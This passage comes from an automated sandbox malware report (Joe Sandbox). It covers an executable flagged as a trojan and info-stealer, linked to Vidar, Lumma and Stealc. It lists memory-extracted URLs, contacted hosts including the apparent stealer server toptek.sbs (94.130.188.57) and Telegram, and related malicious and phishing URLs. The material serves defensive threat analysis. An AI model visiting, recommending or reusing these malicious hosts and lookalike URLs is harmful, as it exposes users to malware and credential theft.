                                                                                                        high
                                                                                                        https://issuetracker.google.com/161903006chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.ecosia.org/newtab/Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, EKXT2N.10.drfalse
                                                                                                            high
                                                                                                            https://drive-daily-1.corp.google.com/chrome.exe, 0000000F.00000003.2024387096.0000335C00490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://drive-daily-5.corp.google.com/chrome.exe, 0000000F.00000003.2024387096.0000335C00490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://duckduckgo.com/favicon.icochrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://anglebug.com/3078chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://anglebug.com/7553chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://anglebug.com/5375chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://anglebug.com/5371chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://anglebug.com/4722chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://m.google.com/devicemanagement/data/apichrome.exe, 0000000F.00000003.2023113077.0000335C001C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://anglebug.com/7556chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://drive-preprod.corp.google.com/chrome.exe, 0000000F.00000003.2024387096.0000335C00490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesDry.com, 0000000A.00000002.2458694756.00000000015F1000.00000004.00000020.00020000.00000000.sdmp, GDT0R9.10.drfalse
                                                                                                                                    high
                                                                                                                                    https://toptek.sbsosh;Dry.com, 0000000A.00000002.2461862261.000000000400C000.00000040.00001000.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2461862261.0000000003FB9000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://google-ohttp-relay-join.fastly-edge.com/%chrome.exe, 0000000F.00000003.2074257167.0000335C02A0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://anglebug.com/6692chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://issuetracker.google.com/258207403chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://anglebug.com/3502chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://anglebug.com/3623chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://anglebug.com/3625chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://anglebug.com/3624chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://t.mDry.com, 0000000A.00000003.1842133810.0000000001650000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842191783.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842628658.0000000001639000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        http://anglebug.com/5007chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://anglebug.com/3862chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://chrome.google.com/webstoreLDDiscoverchrome.exe, 0000000F.00000003.2044447862.0000335C0033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2052211296.0000335C00CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2033004820.0000335C00C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032887424.0000335C00C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2037451733.0000335C00C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034342009.0000335C00C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2036290539.0000335C00CC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://anglebug.com/4836chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://issuetracker.google.com/issues/166475273chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://ch.search.yahoo.com/favicon.icochrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://anglebug.com/4384chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://mail.google.com/mail/?tab=rm&amp;ogblchrome.exe, 0000000F.00000003.2082233107.0000335C02FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2077853947.0000335C02FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078082354.0000335C02F90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2082270243.0000335C0300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084233769.0000335C01C18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://www.google.com/chrome/tips/gs3chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://anglebug.com/3970chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://apis.google.comchrome.exe, 0000000F.00000003.2082270243.0000335C0300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078008068.0000335C03098000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078919962.0000335C03054000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084233769.0000335C01C18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://support.mozilla.org/products/firefoxgro.allDry.com, 0000000A.00000002.2463740067.0000000006AC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://polymer.github.io/CONTRIBUTORS.txtchrome.exe, 0000000F.00000003.2045245740.0000335C0111C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2037713026.0000335C0106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045652191.0000335C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2044701167.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2044657483.0000335C007DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045107909.0000335C003B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2038321277.0000335C01038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2037533554.0000335C00EE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2044625142.0000335C00C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2044790316.0000335C00F3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2037761626.0000335C00F14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2037675980.0000335C0101C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://labs.google.com/search?source=ntpchrome.exe, 0000000F.00000003.2082233107.0000335C02FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2077853947.0000335C02FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078082354.0000335C02F90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2082270243.0000335C0300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084233769.0000335C01C18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://google-ohttp-relay-query.fastly-edge.com/2Pchrome.exe, 0000000F.00000003.2020054096.00002594003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2019787344.00002594003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://anglebug.com/7604chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://anglebug.com/7761chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://google-ohttp-relay-join.fastly-edge.com/hkchrome.exe, 0000000F.00000003.2020338956.0000259400694000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://ogs.google.com/widget/app/so?eom=1chrome.exe, 0000000F.00000003.2082270243.0000335C0300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078008068.0000335C03098000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078919962.0000335C03054000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084233769.0000335C01C18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://anglebug.com/7760chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgDry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2459819787.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, UKX479.10.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoDry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, EKXT2N.10.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      http://anglebug.com/5901chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://anglebug.com/3965chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          http://anglebug.com/6439chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            http://anglebug.com/7406chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://www.google.com/searchchrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://anglebug.com/7161chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://drive-autopush.corp.google.com/chrome.exe, 0000000F.00000003.2024387096.0000335C00490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://www.google.com/search?q=$chrome.exe, 0000000F.00000003.2045107909.0000335C003B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://anglebug.com/7162chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        http://anglebug.com/5906chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          http://anglebug.com/2517chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            http://anglebug.com/4937chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://issuetracker.google.com/166809097chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                239.255.255.250
                                                                                                                                                                                                                                unknownReserved
                                                                                                                                                                                                                                unknownunknownfalse
                                                                                                                                                                                                                                94.130.188.57
                                                                                                                                                                                                                                toptek.sbsGermany
                                                                                                                                                                                                                                24940HETZNER-ASDEfalse
                                                                                                                                                                                                                                149.154.167.99
                                                                                                                                                                                                                                t.meUnited Kingdom
                                                                                                                                                                                                                                62041TELEGRAMRUfalse
                                                                                                                                                                                                                                142.250.181.132
                                                                                                                                                                                                                                www.google.comUnited States
                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                IP
                                                                                                                                                                                                                                192.168.2.4
                                                                                                                                                                                                                                127.0.0.1
                                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                Analysis ID:1579617
                                                                                                                                                                                                                                Start date and time:2024-12-23 06:20:07 +01:00
                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                Overall analysis duration:0h 7m 6s
                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                Number of analysed new started processes analysed:22
                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                Sample name:9EI7wrGs4K.exe
                                                                                                                                                                                                                                renamed because original name is a hash value
                                                                                                                                                                                                                                Original Sample Name:8eb4f92605e35c57a42b0917c221d65c.exe
                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@43/36@5/6
                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                • Number of executed functions: 80
                                                                                                                                                                                                                                • Number of non-executed functions: 296
                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 217.20.58.100, 142.250.181.99, 172.217.17.78, 64.233.162.84, 142.250.181.142, 172.217.17.67, 52.149.20.212, 184.30.17.174, 20.109.210.53, 13.107.246.63
                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, www.gstatic.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                                00:20:57API Interceptor1x Sleep call for process: 9EI7wrGs4K.exe modified
                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                239.255.255.250https://clicks.icims.com/f/a/5aA63l6Vdy8mmO6SfnFRFQ~~/AAIB5gA~/RgRpSzdjP0SjaHR0cHM6Ly9sb2dpbi5pY2ltcy5jb20vdS9yZXNldC12ZXJpZnk_dGlja2V0PVYzbldUZVAzTUxqc0hwVzlXOFlZbFhxamh5SFJZR0tHI2NsaWVudElkPUtKQTk1RHhIT1BOTzU2VWFOUmRSWTU3cHpuNkNNSGNtJmNsaWVudE5hbWU9QXBwbGljYW50IFRyYWNraW5nJmNhbGxiYWNrVXJsPVcDc3BjQgpnZWOyaGeuoGU9UhltaWthLnlhbWFndWNoaUBoYXlzLmNvLmpwWAQAABLwGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  https://staging.effimate.toyo.ai-powered-services.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    https://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=Ne7lLAcjQUaMUQJ9C8JRxUnNOxFiqmxEvtl5lDv69HJUMDcyQThVMFBaMzdYWTM3RDY1SVZJUUVaSC4uGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      http://217.28.130.10/8265/568747470733a2f2f6d61696c2d6864656c2e6c7664642e696e666f2f3f656d61696c3d62722e73756e67406864656c2e636f2e6b72Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        AmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                          Loader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                            medicalanalysispro.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                              GoldenContinent.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                FnTSHWLNWB.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                  NOTIFICATION_OF_DEPENDANTS_1.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    94.130.188.57AmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                      GoldenContinent.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                              149.154.167.99http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • telegram.org/img/favicon.ico
                                                                                                                                                                                                                                                              http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • telegram.org/
                                                                                                                                                                                                                                                              http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                                                                                                                                                              http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • telegram.org/
                                                                                                                                                                                                                                                              http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • telegram.org/
